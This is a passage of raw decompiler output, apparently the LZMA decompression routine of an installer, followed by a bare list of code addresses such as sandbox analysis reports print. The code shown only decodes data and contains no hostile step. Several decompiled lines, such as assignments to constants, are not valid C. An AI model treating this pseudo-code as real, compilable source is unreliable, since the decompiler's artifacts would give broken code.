							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004070E9))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406846
0x00406846
0x0040684b
0x004068c2
0x004068c9
0x004068d3
0x00406eb2
0x00406eb2
0x00406eb5
0x00406eb5
0x00406ebb
0x00406ec1
0x00406ec7
0x00406ee1
0x00406ee4
0x00406eea
0x00406ef5
0x00406ef7
0x00406ec9
0x00406ec9
0x00406ed8
0x00406edc
0x00406edc
0x00406f01
0x00406f28
0x00406f28
0x00406f2e
0x00406f2e
0x00000000
0x00406f03
0x00406f03
0x00406f07
0x004070b6
0x00000000
0x004070b6
0x00406f13
0x00406f1a
0x00406f22
0x00406f25
0x00000000
0x00406f25
0x0040684d
0x0040684d
0x00406851
0x00406859
0x0040685c
0x0040685e
0x00406861
0x00406863
0x00406868
0x0040686b
0x00406872
0x00406879
0x0040687c
0x00406887
0x0040688f
0x0040688f
0x00406889
0x00406889
0x00406889
0x0040687e
0x0040687e
0x0040687e
0x00406896
0x004068b4
0x004068b6
0x00406a89
0x00406a89
0x00406a8c
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a9b
0x00406a9e
0x00406aa1
0x00406aa7
0x00406abf
0x00406ac2
0x00406ac5
0x00406ac8
0x00406ac8
0x00406acb
0x00406ad1
0x00406aa9
0x00406aa9
0x00406ab1
0x00406ab6
0x00406ab8
0x00406aba
0x00406aba
0x00406adb
0x00406ade
0x00406a81
0x00406a87
0x00000000
0x00000000
0x00000000
0x00406ae0
0x00406a5c
0x00406a60
0x00407068
0x00000000
0x00407068
0x00406a66
0x00406a69
0x00406a6c
0x00406a70
0x00406a73
0x00406a79
0x00406a7b
0x00406a7b
0x00406a7e
0x00000000
0x00406a7e
0x00406898
0x00406898
0x0040689b
0x004068a1
0x004068a3
0x004068a3
0x004068a6
0x004068a9
0x004068ab
0x004068ac
0x004068af
0x0040691c
0x0040691c
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692c
0x0040692d
0x00406930
0x00406932
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x0040694a
0x00406966
0x00406969
0x0040696c
0x0040696f
0x00406976
0x0040697c
0x00406980
0x0040694c
0x0040694c
0x00406950
0x00406958
0x0040695d
0x0040695f
0x00406961
0x00406961
0x0040698a
0x0040698d
0x00406904
0x00406904
0x0040690a
0x004069bd
0x004069c3
0x00000000
0x00000000
0x004069c5
0x004069c8
0x004069cb
0x004069ce
0x004069d1
0x004069d4
0x004069d7
0x004069da
0x004069dd
0x004069e3
0x004069fb
0x004069fe
0x00406a01
0x00406a04
0x00406a04
0x00406a07
0x00406a0d
0x004069e5
0x004069e5
0x004069ed
0x004069f2
0x004069f4
0x004069f6
0x004069f6
0x00406a17
0x00406a1a
0x00406998
0x0040699c
0x0040705c
0x00000000
0x0040705c
0x004069a2
0x004069a5
0x004069a8
0x004069ac
0x004069af
0x004069b5
0x004069b7
0x004069b7
0x004069ba
0x004069ba
0x00406a1a
0x00406a21
0x00406a21
0x00406a21
0x00406a25
0x00406a25
0x00406a28
0x00406a2b
0x00406a2f
0x00407074
0x00000000
0x00407074
0x00406a35
0x00406a38
0x00406a3b
0x00406a3e
0x00406a41
0x00406a44
0x00406a47
0x00406a49
0x00406a4c
0x00406a4f
0x00406a52
0x00406a54
0x00406a54
0x00406a54
0x00406bf1
0x00406bf1
0x00406bf4
0x00406bf4
0x00000000
0x00406bf4
0x00406916
0x00000000
0x00000000
0x00000000
0x00406993
0x004068df
0x004068e3
0x00407050
0x004070cc
0x004070d4
0x004070db
0x004070dd
0x004070e4
0x004070e8
0x004070e8
0x004068e9
0x004068ec
0x004068ef
0x004068f3
0x004068f6
0x004068fc
0x004068fe
0x004068fe
0x00406901
0x00000000
0x00406901
0x0040698d
0x00406896
0x004066ca
0x004066ca
0x004066d3
0x004070e1
0x004070e1
0x00000000
0x004070e1
0x004066d9
0x00000000
0x004066e4
0x00000000
0x00000000
0x004066ed
0x004066f0
0x004066f3
0x004066f7
0x00000000
0x00000000
0x004066fd
0x00406700
0x00406702
0x00406703
0x00406706
0x00406708
0x00406709
0x0040670b
0x0040670e
0x00406713
0x00406718
0x00406721
0x00406734
0x00406737
0x00406743
0x0040676b
0x0040676d
0x0040677b
0x0040677b
0x0040677f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040676f
0x0040676f
0x00406772
0x00406773
0x00406773
0x00000000
0x0040676f
0x00406749
0x0040674e
0x0040674e
0x00406757
0x0040675f
0x00406762
0x00000000
0x00406768
0x00406768
0x00000000
0x00406768
0x00000000
0x00406785
0x00406785
0x00406789
0x00407035
